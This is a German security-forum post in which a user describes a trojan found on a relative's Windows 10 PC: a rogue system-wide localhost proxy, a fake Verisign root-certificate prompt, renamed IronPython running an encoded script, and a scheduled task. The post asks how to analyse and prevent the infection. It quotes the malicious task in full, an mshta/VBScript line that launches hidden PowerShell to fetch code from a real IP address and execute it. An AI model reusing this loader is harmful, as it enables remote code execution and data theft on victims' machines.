Zurück   Trojaner-Board > Archiv - Kein Posten möglich > Mülltonne

Mülltonne: sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart

Windows 7 Beiträge, die gegen unsere Regeln verstoßen haben, solche, die die Welt nicht braucht oder sonstiger Müll landet hier in der Mülltonne...

 
Alt 28.05.2021, 11:23   #1
trwhfrkhgn
 
sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart - Standard

sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart



Hallo Leute,

ich wollte mal fragen, ob mir jemand ein paar Einblicke in einen gefundenen Trojaner geben kann, z.B. wie man sowas zukünftig findet, verhindert, was der Trojaner abgefischt haben könnte, ob es ein bekannter Trojaner oder was vollkommen anderes ist, ... .
Mein Grund ist einfach nur Interesse/Wissensdurst:

Hintergrund: Mein Opa bat mich um Hilfe, weil er keine Internetseiten mehr öffnen konnte und seit heute ständig eine Zertifikatsmeldung nervte.

Drei merkwürdige Dinge habe ich auf seinem Windows 10 Rechner gefunden:
1.) In den Windows-Einstellungen war ein systemweiter Proxy eingestellt:
Code:
ATTFilter
http=localhost:8000;https=localhost:8000
         
2.) im Taskplaner fand ich folgenden Task:
Code:
ATTFilter
mshta.exe  --> vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell  Invoke-Expression -Command:(wget -uri 185.141.27.215/gate990.php -method post -body cMgEfr65 -UseBasicParsing).content"", 0 : window.close")
         
Dieser Task hat die ständige Zertifikatsmeldung erzeugt, ich solle doch bitte folgendem Stammzertifikat zukünftig vertrauen: OV Verisign CA mit einem veralteten SHA1-Fingerprint.

3.) via Autostart-Ordner wurde eine ctfmon.exe gestartet, welche sich mit vielen anderen Dateien im %Appdata%-Unterordner 4FZBwVTf befand. Allerdings ist dies nur eine umbenannte Datei, denn tatsächlich handelt es sich hierbei um IronPython v2.7.11.
Damit wurde ein base64-kodiertes Python-Script (update.phy) ausgeführt, dessen Inhalt habe ich am Ende eingefügt. Mit dessen Dekodierung bin ich leider gescheitert, denn da kam bei mir nur Bytecode raus und bin daher mit meiner Detektivarbeit am Ende meines Wissens.

Fazit:
Virenscanner oder VirusTotal.com springen natürlich nicht an und damit läuft das Teil vollkommen unter dem Radar. Zum Glück hat die o.g. Vertrauensabfrage für das Verisign-Stammzertifikat alle 5 Minuten auf sich aufmerksam gemacht. Hätte mein Opa diesem Stammzertifikat einfach genervt zugestimmt, dann hätten vermutlich monatelang Daten über den lokalen Proxy vollkommen unbemerkt abgesaugt werden können?!?

nun zu meinen Fragen und zum Grund meiner Forumanfrage:
- kann mir jemand tiefere Einblick in die Hintergründe diese Trojaner geben, z.B.
- indem jemand den base64-code dekodiert und dann dessen Zweck versteht
- wie konnte der systemweite Proxy so leicht eingetragen werden?
- ist diese Malware schon länger bekannt, vielleicht in abgewandelter Form
- wie könnte man einen Virenscanner dazu bringen eine Warnung auszugeben,
der base64-code scheint jedenfalls zu gut getarnt oder unverdächtig zu wirken
- was soll ich meinem Opa zukünftig raten, um derartige Maleware nicht auf den Rechner zu bekommen?
- wie soll er sich jetzt nach dem Befall verhalten? Ich habe ihm schon mal geraten vorsichtshalber alle wichtigen Online-Passwörter zu ändern

Den Inhalt der Datei update.py findet Ihr nachfolgend. Den gesamten Ordner unter %AppData% mit IronPython und allen Script-Dateien kann ich bei Bedarf gern zur Verfügung stellen.
Angehängte Dateien
Dateityp: zip update.py.zip (319,0 KB, 26x aufgerufen)

 

Themen zu sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart
a.exe, appdata, autostart, bat, befall, code, dateien, folge, frage, internetseite, localhost, maleware, malware, proxy, rechner, scan, seite, seiten, trojaner, vbscript, virus, warnung, win, windows, öffnen




Ähnliche Themen: sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart


  1. Trojan:Script/Phonzy.A!ml von Audacity de Win10 und Mac
    Log-Analyse und Auswertung - 05.02.2021 (6)
  2. Unter WIN10 im Explorerfenster - Chinesische (versteckte) Daten unter den zuletzt verwendeten Dateien!
    Plagegeister aller Art und deren Bekämpfung - 09.10.2020 (22)
  3. Programm zum automatischen Aktualisieren unter Win10
    Alles rund um Windows - 26.06.2019 (6)
  4. Win10: Chinesische Zeichen unter Zuletzt verwendete Dateien
    Plagegeister aller Art und deren Bekämpfung - 09.02.2019 (18)
  5. Win10 Pro: Browser stürzen ab-(Chrome&Edge)-GGF Schädlingsbefall-(Hinweise: TR/Dropper.Gen & suspected of Malware.Agent.39 "PAK_Generic.008)
    Log-Analyse und Auswertung - 20.03.2018 (17)
  6. ESET findet infizierte Datei C:\Windows\Installer\12fff.msi unter WIN10
    Plagegeister aller Art und deren Bekämpfung - 27.12.2017 (30)
  7. Win10 64Bit - unbekannte exe-Dateien im Autostart nach CCleaner 5.33.6162
    Plagegeister aller Art und deren Bekämpfung - 20.10.2017 (18)
  8. Win10: Chinesische Schriftzeichen als Dateibezeichnung unter "Zuletzt verwendete Dateien"
    Plagegeister aller Art und deren Bekämpfung - 28.08.2017 (21)
  9. Warnung, der Parameter F wurde nicht angegeben, unter Win10
    Alles rund um Windows - 14.03.2017 (2)
  10. SSD Tools unter Win10 nötig?
    Netzwerk und Hardware - 08.02.2017 (1)
  11. Bluscreen unter Win10 Upgrade Installation
    Alles rund um Windows - 29.11.2016 (27)
  12. WIN10 installiert, Rechner läuft sehr langsam und unter manchen Userkonten kein Mozilla möglich
    Log-Analyse und Auswertung - 21.02.2016 (2)
  13. Wie entferne ich "Script.Adware.DealPly.G (Engine B)" unter Windows7?
    Log-Analyse und Auswertung - 06.10.2015 (20)
  14. Autostart unter w8.1
    Alles rund um Windows - 26.11.2014 (4)
  15. Samsung Monte will Proxy-Passwort, aber kein Proxy installiert
    Smartphone, Tablet & Handy Security - 16.06.2014 (2)
  16. Antwort erwünscht
    Plagegeister aller Art und deren Bekämpfung - 24.10.2013 (22)
  17. Autostart unter DOS bearbeiten
    Alles rund um Windows - 27.10.2008 (3)

Zum Thema sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart - Hallo Leute, ich wollte mal fragen, ob mir jemand ein paar Einblicke in einen gefundenen Trojaner geben kann, z.B. wie man sowas zukünftig findet, verhindert, was der Trojaner abgefischt haben - sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart...
Archiv
Du betrachtest: sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.